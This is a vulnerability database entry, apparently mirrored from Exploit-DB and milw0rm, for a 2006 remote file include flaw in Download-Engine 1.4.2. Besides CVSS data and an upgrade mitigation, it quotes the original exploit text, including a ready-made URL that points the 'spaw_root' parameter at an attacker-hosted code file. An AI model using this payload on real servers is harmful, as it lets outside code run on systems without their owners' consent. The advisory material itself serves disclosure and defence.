Download-Engine Remote File Include

vendor:

Download-Engine

by:

v1per-haCker

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Download-Engine

Affected Version From: 1.4.2

Affected Version To: 1.4.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:alexscriptengine:download-engine

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Download-Engine Remote File Include

Download-Engine version 1.4.2 is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'spaw_root' parameter of the 'spaw_control.class.php' script. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Download-Engine.

Source

Exploit-DB raw data:

#======================================================================================#
#  Download-Engine Remote File Include                                       		#
#======================================================================================#
# Info:-										#
#											#
# Scripts: Download-Engine								#
# Download: http://www.alexscriptengine.de/v2/dl_engine/redirect.php?dlid=50&ENGINEsessID=4754ee8243de5f333ec74272f249b649 
# Version : 1.4.2									#
# Dork & vuln : download scripts and think :)						#
# Note : only this version effcted :)							#
#======================================================================================#
#Exploit :										#
#											#
#http://localhost/path/admin/includes/spaw/spaw_control.class.php?spaw_root=http://EvElCoDe.txt?			 
#											#
#======================================================================================#
#Discoverd By : v1per-haCker								#
#											#
#Conatact : v1per-hacker[at]hotmail.com							#
#											#
#XP10_hackEr Team									#
#											#
#Greetz to : 										#
#abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |  ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net | metoovet
#                 									#
#	     										#
#And All Members In XP10_hackEr Team							#	
#Thanx to str0ke :)									#
#						[WWW.XP10.COM]				#
#======================================================================================#

# milw0rm.com [2006-10-12]